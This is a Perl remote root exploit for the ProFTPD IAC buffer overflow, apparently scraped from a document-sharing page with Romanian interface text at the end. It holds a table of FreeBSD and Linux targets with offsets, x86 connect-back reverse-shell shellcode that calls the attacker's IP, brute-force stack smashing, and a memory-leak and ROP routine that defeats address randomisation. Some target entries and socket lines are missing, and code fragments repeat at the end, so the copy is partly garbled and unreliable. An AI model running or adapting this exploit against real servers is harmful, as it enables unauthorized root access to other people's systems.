ProFTPD IAC

use IO::Socket;
$numtargets = 13;
@targets =
(
# Plain Stack Smashing
#Confirmed to work
["FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary)",# PLATFORM SPEC
"FreeBSD", # OPERATING SYSTEM
0, # EXPLOIT STYLE
0xbfbfe000, # OFFSET START
0xbfbfff00, # OFFSET END
1029], # ALIGN
#Confirmed to work
["FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary)",
"FreeBSD",
0,
0xbfbfe000,
0xbfbfff00,
1021],
# Return into Libc
#Confirmed to work
["Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1, # EXPLOIT STYLE
0x0804CCD4, # write(2) offset
8189, # ALIGN
0], # PADDING
# Confirmed to work
["Debian GNU/Linux 5.0, ProFTPD 1.3.3 Server (Plesk binary)",
"Linux",
1,
0x0804D23C,
4101,
0],
#Confirmed to work
["Debian GNU/Linux 4.0, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1,
0x0804C9A4,
8189,
0],
#Confirmed to work
["Debian Linux Squeeze/sid, ProFTPD 1.3.3a Server (distro binary)",
"Linux",
1,
0x080532D8,
4101,
12],
["SUSE Linux 9.3, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1,
0x0804C9C4,
8189,
0],
["SUSE Linux 10.0/10.3, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1,
0x0804CAA8,
8189,
0],
"Linux",
1,
0x0804CBBC,
8189,
0],
"Linux",
1,
0x0804CCBC,
8189,
0],
#Confirmed to work
"Linux",
1,
0x0804CCE0,
8189,
0],
["SUSE Linux SLES 10, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1,
0x0804CA2C,
8189,
0],
#Confirmed to work
["CentOS 5, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1,
0x0804C290,
8189,
0],
# feel free to add more targets.
);
#freebsd reverse shell port 45295
#setup a netcat on this port ^^
$bsdcbsc =
# setreuid
"\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
# connect back :>
"\x31\xc0\x31\xdb\x53\xb3\x06\x53".
"\xb3\x01\x53\xb3\x02\x53\x54\xb0".
"\x61\xcd\x80\x31\xd2\x52\x52\x68".
"\x41\x41\x41\x41\x66\x68\xb0\xef".
"\xb7\x02\x66\x53\x89\xe1\xb2\x10".
"\x52\x51\x50\x52\x89\xc2\x31\xc0".
"\xb0\x62\xcd\x80\x31\xdb\x39\xc3".
"\x74\x06\x31\xc0\xb0\x01\xcd\x80".
"\x31\xc0\x50\x52\x50\xb0\x5a\xcd".
"\x80\x31\xc0\x31\xdb\x43\x53\x52".
"\x50\xb0\x5a\xcd\x80\x31\xc0\x43".
"\x53\x52\x50\xb0\x5a\xcd\x80\x31".
"\xc0\x50\x68\x2f\x2f\x73\x68\x68".
"\x2f\x62\x69\x6e\x89\xe3\x50\x54".
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0".
"\xb0\x01\xcd\x80";
#linux reverse shell port 45295 by bighawk
#setup a netcat on this port ^^
$lnxcbsc =
# setreuid
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x90\x90\x90".
# connect back :>
"\x6a\x66".
"\x58".
"\x6a\x01".
"\x5b".
"\x31\xc9".
"\x51".
"\x6a\x01".
"\x6a\x02".
"\x89\xe1".
"\xcd\x80".
"\x68\x7f\x7f\x7f\x7f". # IP
"\x66\x68\xb0\xef". # PORT
"\x66\x6a\x02".
"\x89\xe1".
"\x6a\x10".
"\x51".
"\x50".
"\x89\xe1".
"\x89\xc6".
"\x6a\x03".
"\x5b".
"\x6a\x66".
"\x58".
"\xcd\x80".
"\x87\xf3".
"\x6a\x02".
"\x59".
"\xb0\x3f".
"\xcd\x80".
"\x49".
"\x79\xf9".
"\xb0\x0b".
"\x31\xd2".
"\x52".
"\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e".
"\x89\xe3".
"\x52".
"\x53".
"\x89\xe1".
"\xcd\x80";
sub exploit1 {
for ($counter=$targets[$ttype][3]; $counter < $targets[$ttype][4]; $counter
+= 250) {
printf("[$target] CURRENT OFFSET = %08x :pP\n", $counter);
$ret = pack("V", $counter);
$align = $targets[$ttype][5];
my $sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => 21,
Proto => 'tcp');
$stack = "KCOPERULEZKCOPERULEZKC" . $ret . "\x90" x 500 . $shellcode . "
A" x 10;
$v = <$sock>;
print $sock "\x00" x $align . "\xff" . $stack . "\n";
close($sock);
}
}
#
# uses write(2) to fetch process memory out of the remote box (you can find the
offset using IDA)
# only the write(2) plt entry offset is needed for the exploit to work (and of c
ourse the
# align value)
# once the correct write value is given to the exploit it fetches the memory spa
ce of proftpd.
# with this information the exploit can find function entries and byte values
# relative to the write(2) address.
# once the memory is read out the exploit does the following to circumvent linux
adress space
# randomization:
#
# 1.) calculate mmap64() plt entry
# 2.) seek for assembly instructions in the proftpd memory space relative to wri
te(2)
# such as pop pop ret instructions
# 3.) call mmap64() to map at address 0x10000000 with protection read,write,exec
ute
# 4.) calculate offset for memcpy() which is later used to construct the shellco
de copy routine
# 4.) copy known assembly instructions (which have been found before using the m
emory read)
# to address 0x10000000. these instructions will copy the shellcode from ESP
to 0x10000100
# and make use of the memcpy found before
# 5.) actually jump to the shellcode finder
# 6.) once the shellcode has been copied to 0x10000100 jump to it
# 7.) shellcode gets executed and we have our desired root shell.
sub exploit2 {
printf("[$target] %s :pP\n", $targets[$ttype][0]);
$align = $targets[$ttype][4];
$write_offset = $targets[$ttype][3];
$padding = $targets[$ttype][5];
$|=1;
print "align = $align\n";
print "Seeking for write(2)..\n";
#known good write(2) values
#0x0804C290
#0x0804A85C
#0x0804A234
#0x08052830
#080532D8 proftpd-basic_1.3.3a-4_i386
#08052938 proftpd-basic_1.3.2e-4_i386 (ubunutu)
#0804CCD4 psa-proftpd_1.3.2e-debian5.0.build95100504.17_i386 !!
printf "Using write offset %08x.\n", $write_offset;
$k = $write_offset;
$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => 21,
Proto => 'tcp');
$sock->sockopt(SO_LINGER, pack("ii", 1, 0));
#$x = <stdin>;
$stack = "KCOPERULEZKCOPERULEZKC". "C" x $padding .
pack("V", $k). # write
"\xcc\xcc\xcc\xcc".
"\x01\x00\x00\x00". # fd for write
pack("V", $k). # buffer for write
"\xff\xff\x00\x00"; # length for write
$v = <$sock>;
vec ($rfd, fileno($sock), 1) = 1;
$timeout = 2;
if (select ($rfd, undef, undef, $timeout) >= 0
&& vec($rfd, fileno($sock), 1))
{
if (read($sock, $buff, 0xffff) == 0xffff) {
printf "\nSUCCESS. write(2) is at %08x\n", $k;
close($sock);
goto lbl1;
}
}
close($sock);
printf "wrong write(2) offset.\n";
exit;
lbl1:
# Once we're here chances are good that we get the root shell
print "Reading memory from server...\n";
PeerPort => 21,
Proto => 'tcp');
$stack = "KCOPERULEZKCOPERULEZKC" . "C" x $padding .
pack("V", $k). # write
"\xcc\xcc\xcc\xcc".
"\x01\x00\x00\x00". # fd for write
pack("V", $k). # buffer for write
"\xff\xff\x0f\x00"; # length for write
$v = <$sock>;
read($sock, $buff, 0xfffff);
if (($v = index $buff, "\x5E\x5F\x5D") >= 0) {
$pop3ret = $k + $v;
printf "pop pop pop ret located at %08x\n", $pop3ret;
} else {
print "Could not find pop pop pop ret\n";
exit;
}
if (($v = index $buff, "\x83\xC4\x20\x5B\x5E\x5D\xC3") >= 0) {
$largepopret = $k + $v;
printf "large pop ret located at %08x\n", $largepopret;
} else {
print "Could not find pop pop pop ret\n";
exit;
}
if (($v = index $buff, "\xC7\x44\x24\x08\x03\x00\x00\x00\xC7\x04\x24\x00\x00
\x00\x00\x89\x44\x24\x04") >= 0) {
$addr1 = $k+$v+23;
$mmap64 = unpack("I", substr($buff, $v+20, 4));
$mmap64 = $addr1 - (0xffffffff-$mmap64);
printf "mmap64 is located at %08x\n", $mmap64;
} else {
if (($v = index $buff, "\x89\x44\x24\x10\xA1\xBC\xA5\x0F\x08\x89\x44\x24
\x04\xe8") >= 0) {
$addr1 = $k+$v+17;
$mmap64 = unpack("I", substr($buff, $v+14, 4));
$mmap64 = $addr1 - (0xffffffff-$mmap64);
printf "mmap64 is located at %08x\n", $mmap64;
} else {
print "Could not find mmap64()\n";
exit;
}
}
if (($v = index $buff, "\x8D\x45\xF4\x89\x04\x24\x89\x54\x24\x08\x8B\x55

\x08\x89\x54\x24\x04\xE8") >= 0) {
$addr1 = $k+$v+21;
$memcpy = unpack("I", substr($buff, $v+18, 4));
$memcpy = $addr1 - (0xffffffff-$memcpy);
printf "memcpy is located at %08x\n", $memcpy;
} else {
if (($v = index $buff, "\x8B\x56\x10\x89\x44\x24\x08\x89\x54\x24\x04\x8B
\x45\xE4\x89\x04\x24\xe8") >= 0) {
$addr1 = $k+$v+21;
} else {
if (($v = index $buff, "\x89\x44\x24\x04\xA1\xBC\x9F\x0E\x08\x89\x04\x24
") >= 0) {
$addr1 = $k+$v+16;
} else {
if (($v = index $buff, "\x89\x7C\x24\x04\x89\x1C\x24\x89\x44\x24\x08") >
= 0) {
$addr1 = $k+$v+15;
} else {
if (($v = index $buff, "\x8B\x55\x10\x89\x74\x24\x04\x89\x04\x24\x89\x54
\x24\x08") >= 0) {
$addr1 = $k+$v+18;
} else {
print "Could not find memcpy()\n";
exit;
}
}
}
}
}
if (($v = index $buff, "\xfc\x8b") >= 0) {
$byte1 = $k+$v;
printf ("byte1: %08x\n", $byte1);
} else {
print "Could not find a special byte\n";
exit;
}
if (($v = index $buff, "\xf4") >= 0) {
$byte2 = $k+$v;
} else {
exit;
}
if (($v = index $buff, "\xbf") >= 0) {
$byte3 = $k+$v;
} else {
exit;
}
if (($v = index $buff, "\x00\x01\x00") >= 0) {
$byte4 = $k+$v;
} else {
exit;
}
if (($v = index $buff, "\x10") >= 0) {
$byte5 = $k+$v;
} else {
exit;
}
if (($v = index $buff, "\xB9\x00\x02\x00\x00") >= 0) {
$byte6 = $k+$v;
} else {
exit;
}
if (($v = index $buff, "\xf3") >= 0) {

$byte7 = $k+$v;
} else {
exit;
}
if (($v = index $buff, "\xA4") >= 0) {
$byte8 = $k+$v;
} else {
exit;
}
if (($v = index $buff, "\xeb\xff") >= 0) {

$byte9 = $k+$v;
} else {
exit;
}
# shellcode copy routine:
#0100740B FC CLD
#0100740C 8BF4 MOV ESI,ESP
#0100740E BF 00010010 MOV EDI,10000100
#01007413 B9 00020000 MOV ECX,200
#01007418 F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
# EB FF JMP +0xFF
# FC 8B
# F4 BF
# 00 01 00
# 10
# B9 00 02 00 00
# F3:A4
# EB FF
# El1Te X-Ploit TechNiqUe (C)
print "Building exploit buffer\n";
$stack = "KCOPERULEZKCOPERULEZKC" . "C" x $padding .
pack("V", $mmap64). # mmap64()
pack("V", $largepopret). # add esp, 20h; pop; pop
"\x00\x00\x00\x10". # mmap start
"\x00\x10\x00\x00". # mmap size
"\x07\x00\x00\x00". # mmap prot
"\x32\x00\x00\x00". # mmap flags
"\xff\xff\xff\xff". # mmap fd
"\x00\x00\x00\x00". # mmap offset
"\x00\x00\x00\x00". # mmap offset
"\x00\x00\x00\x00".
"\x00\x00\x00\x00".
"\x00\x00\x00\x00".
"\x00\x00\x00\x00".
pack("V", $memcpy). # memcpy()
pack("V", $pop3ret). # pop; pop; pop; retn
"\x00\x00\x00\x10". # destination
pack("V", $byte1). # origin
"\x02\x00\x00\x00". # number of bytes to copy

"\x0d\x00\x00\x10". # destination
"\x0e\x00\x00\x10". # destination
"\x0f\x00\x00\x10". # destination
"\x00\x00\x00\x10". # JUMP TO 0x10000000 rwxp address
"\x90" x 100 . $shellcode . "\x90" x 10;

print "Sending exploit buffer!\n";
PeerPort => 21,
Proto => 'tcp');
$v = <$sock>;
print "Check your netcat?\n";
while(<$sock>) {
print;
}
}
sub usage() {
print "written by PUREH\n";
print "usage:\n".
"proremote.pl <target ip/host> <your ip> <target type>\n\n";
for ($i=0; $i<$numtargets; $i++) {
print "\t[".$i."]\t". $targets[$i][0]. "\r\n";
}
exit;
}
if ($#ARGV ne 2) { usage; }
$target = $ARGV[0];
$cbip = $ARGV[1];
$ttype = $ARGV[2];
$platform = $targets[$ttype][1];
$style = $targets[$ttype][2];
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
if ($platform eq "FreeBSD") {
$shellcode = $bsdcbsc;
substr($shellcode, 37, 4, $a1 . $a2 . $a3 . $a4);
} else {
if ($platform eq "Linux") {
$shellcode = $lnxcbsc;
substr($shellcode, 31, 4, $a1 . $a2 . $a3 . $a4);
} else {
print "typo ?\n";
exit;
}}
if ($style eq 0) {
exploit1;
} else {
exploit2;
}
print "done.\n";
exit;

ProFTPD IAC

Încărcat de

Informații document

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

ProFTPD IAC

Încărcat de

Drepturi de autor:

Formate disponibile

use IO::Socket;

if (($v = index $buff, "\x8D\x45\xF4\x89\x04\x24\x89\x54\x24\x08\x8B\x55

if (($v = index $buff, "\xf3") >= 0) {

if (($v = index $buff, "\xeb\xff") >= 0) {

pack("V", $memcpy). # memcpy()

"\x90" x 100 . $shellcode . "\x90" x 10;

S-ar putea să vă placă și